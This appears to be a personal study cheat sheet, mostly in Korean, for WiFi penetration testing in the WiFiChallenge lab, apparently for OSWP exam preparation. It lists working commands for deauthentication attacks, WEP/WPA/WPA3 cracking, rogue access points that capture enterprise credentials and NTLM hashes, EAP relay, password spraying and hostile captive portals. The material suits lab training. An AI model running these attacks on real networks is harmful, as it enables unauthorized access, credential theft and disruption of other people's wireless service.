g3rm
Info
Exam
https://lab.wifichallenge.com/
Resource
https://www.offsec.com/courses/pen-210/ https://lab.wifichallenge.com/ https://pierrelouis.blog/posts/oswp-lab-setup/ https://zeyadazima.com/certificates/oswprg/ https://youtu.be/Ra0dGPYScLQ?si=KMNJr7d0PbI08b8Y
Setting
https://github.com/r4ulcl/WiFiChallengeLab-docker
git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose --file docker-compose.yml up -d
Basic
Enum Info
# 드라이버 확인
sudo airmon-ng
# USB 장치 나열
sudo lsusb -vv
# 종속성, 호환성 및 펌웨어 요구사항 확인
sudo modinfo ath9k_htc
# 로드된 모듈과 각 모듈의 종속성 나열
lsmod
# 모듈 제거 - 종속되어 있는 거 모두 나열
sudo rmmod <module_name1> <module_name2>
Brute Force
# rockyou 변환
cat ~/rockyou-top100000.txt | awk '{print "wifi-" $1}' > ~/wifi-rockyou.txt
mac change
systemctl stop network-manager
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
Wireless Tools
iw util
# 사용 가능한 채널/주파수 표시
sudo iwlist wlan0 frequency
# 더 자세히 표시
sudo iw list
# 채널 설정
sudo iwconfig wlan0mon channel 11
# 사용 가능한 SSID 나열
sudo iw dev wlan0 scan | grep SSID
# iw 스캔 출력 구문 분석을 통해 사용 가능한 SSID 및 채널 나열
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
# 새 가상 인터페이스(VIF) wlan0mon를 생성 및 활성화 및 제거
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up
sudo iw dev wlan0mon interface del
# 덤프
sudo tcpdump -i wlan0mon
# 규제 확인 country 00
sudo iw reg get
# 규제 도메인 변경 및 설정 / 영구 변경은 /etc/default/crda에서 REGDOMAIN=US 처럼 입력
iw reg set <COUNTRY>
rfkill
rfkill은 연결된 무선 기기를 활성화 또는 비활성화하는 도구
# 활성화된 모든 Wi-Fi 및 Bluetooth 장치를 표시
sudo rfkill list
#무선 통신을 비활성화 및 재활성화
sudo rfkill block all
sudo rfkill block <block_id>
sudo rfkill unblock <block_id>
air
# 모니터 모드로 전환 wlan0 -> wlan0mon 으로 드라이버 명 변경됨.
sudo airmon-ng
sudo airmon-ng start wlan0
# 채널 스캔
# -c11 : channel / -w : log파일
sudo airodump-ng wlan0mon -w ~/wifi/scan --manufacturer --wps --band abg -c11 --bssid 00:00:00:00:00:00
# replay 공격 -숫자 : 공격 방법
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:AA:19:29 wlan0mon
sudo aireplay-ng -3 -b F0:9F:C2:AA:19:29 -h BA:49:A9:53:A1:8C wlan0mon
# crack : airodump -> aireplay -> aircrack 동시에 진행하기
sudo aircrack-ng wifi-old-01.cap
# decap : psk 패킷 해독
airdecap-ng -e wifi-mobile -p $PASSWORD ~/wifi/scanc6-02.cap
wireshark ~/wifi/scanc6-02-dec.cap
mdk
# AP-mac을 통한 ssid 유추
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f ~/wifi-rockyou.txt
WPA
# https://android.googlesource.com/platform/external/wpa_supplicant_8/+/master-soong/wpa_supplicant/wpa_supplicant.conf
# default credentials
network={
ssid="$ESSID"
key_mgmt=NONE
scan_ssid=1
}
# WEP credentials
network={
ssid="wifi-old"
key_mgmt=NONE
wep_key0=$PASSWORD
wep_tx_keyidx=0
}
# PSK credentials
network={
ssid="wifi-mobile"
psk="$PASSWORD"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}
# SAE
network={
# Connect via WPA3 to a WPA2+WPA3 network
ssid="my_network"
psk="password"
key_mgmt=SAE
ieee80211w=1
}
# MGT, EAP-PEAP
network={
ssid="wifi-regional-tablets"
## The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
## Do not modify
identity=""
anonymous_identity=""
password=""
## This initialises the variables for me.
## -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
## Dont want to connect back to ourselves,
## so add your rogue BSSID here.
bssid_blacklist=F0:9F:C2:00:00:00
}
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
# wpa_supplicant 사용 전 충돌 방지 필수
sudo systemctl stop NetworkManager
sudo systemctl disable NetworkManager
# network 연결 및 IP 할당 받기 및 IP 얻기
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
dhclient wlan2 -v
arp-scan -I wlan2 -l
# IP 할당 해제
dhclient wlan2 -r
SAE WPA3
## SAE
# brute force
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462
# downgrade
# Wireless Management -> RSN Information -> Management Frame Protection Required, Capable의 False 확인 시 인증 해제 가능
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52
WEP Crack
# auto
besside-ng -c 1 -b F0:9F:C2:AA:19:29 wlan2 -v
# manual - aircrack 참조
PSK
# 패스워드 얻는 부류 -> 인증해제 공격 -> 패킷 덤프 -> aircrack
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon
Fake AP
# hostapd.conf
interface=wlan1
driver=nl80211
hw_mode=g
channel=1
ssid=wifi-offices
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
hostapd-mana hostapd.conf
# If the original is hostapd.hccapx (text):
sed 's/^\[WPA2-EAPOL HASHCAT\][[:space:]]*//' hostapd.hccapx > clean_hashes.txt
hashcat -a 0 -m 2500 clean_hashes.txt ~/rockyou-top100000.txt
MGT
relay할때, 취약한 클라이언트를 인증해제 한 뒤 해당 자격증명으로 온갖 AP에 Relay 접속 시도 해보기
# capture 할땐, --band abg 제외하기
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE
# MGT가 있는 AP가 사용하는 인증서 표기
cd /root/tools/
bash pcapFilter.sh -f ~/wifi/scanc44-02.cap -C
# EAP 방식 확인
cd /root/tools/EAP_buster/
bash ./EAP_buster.sh wifi-global 'GLOBAL\GlobalAdmin' wlan1
# Rogue AP 구성 & NTLM 덤프
## 인증서 설치
cd /root/tools/eaphammer
python3 ./eaphammer --cert-wizard
python3 ./eaphammer -i wlan3 --auth wpa-eap --essid wifi-corp --creds --negotiate balanced
## 기존 모든 AP에 연결해제 공격 -> Rogue AP에 붙도록 유도
iwconfig wlan0mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:1A wlan0mon -c 64:32:A8:07:6C:40
airmon-ng start wlan1
iwconfig wlan1mon channel 44
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan1mon -c 64:32:A8:07:6C:40
## 해시 크랙 / bulldogs1234
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
hashcat -a 0 -m 5500 hashcat.5500 ~/rockyou-top100000.txt --force
# Rogue AP Relay
## mac변경
airmon-ng stop wlan1mon
ip link set wlan1 down
macchanger -m F0:9F:C2:00:00:00 wlan1
ip link set wlan1 up
## Shell 1 : Rogue AP
cd ~/tools/berate_ap/
./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets
## Shell 2 : 인증 해제
airmon-ng start wlan0
iwconfig wlan0mon channel 44
aireplay-ng -0 0 wlan0mon -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55
## Shell 3
cd ~/tools/wpa_sycophant/
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3
# Brute Force
cd ~/tools/air-hammer
echo 'CONTOSO\test' > test.user
./air-hammer.py -i wlan3 -e wifi-corp -p ~/rockyou-top100000.txt -u test.user
# Password Relay
cat ~/top-usernames-shortlist.txt | awk '{print "CONTOSO\\" $1}' > ~/top-usernames-shortlist-contoso.txt
./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u ~/top-usernames-shortlist-contoso.txt
# Rogue AP Captive & Responder
./eaphammer --essid WiFi-Restaurant --interface wlan4 --captive-portal
./eaphammer --essid WiFi-Restaurant --interface wlan2 --hostile-portal
WireShark
Local Capture
# Wi-Fi 어댑터를 모니터 모드로 설정
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
# channel hop & quickly scan all channels on 2.4GHz
for channel in 1 6 11 2 7 10 3 8 4 9 5
do
iw dev wlan0mon set channel ${channel}
sleep 1
done
## channel hop 2
sudo airodump-ng wlan0mon
# all interface
sudo wireshark -D
# interface capture start & Monitor Mode & filter
sudo wireshark -i <interface> -k -I -f "<filter>" -s <byte length>
# pcap open
wireshark file.pcap
Remote Capture
sudo tcpdump -U -w - -i wlan0mon | wireshark -k -i -
Filtter
# 0, 1, 2, 3 -> 관리, 제어, 데이터, 확장 프레임
wlan.fc.type==2
!(wlan.fc.type == 1)
# 장치 필터링 & 비콘 & 프로브(요청 및 응답) & 연관성(요청 및 응답) & 데이터
((wlan addr1 3A:30:F9:0F:E1:95) or (wlan addr2 3A:30:F9:0F:E1:95) or (wlan addr3 3A:30:F9:0F:E1:95) or (wlan addr4 3A:30:F9:0F:E1:95)) and not (subtype beacon) and not (type ctl) and not (subtype probe-req) and not (subtype probe-resp)
wifi_db
cd /root/tools/wifi_db
python3 wifi_db.py -d wifichallenge.SQLITE ~/wifi/
sqlitebrowser wifichallenge.SQLITE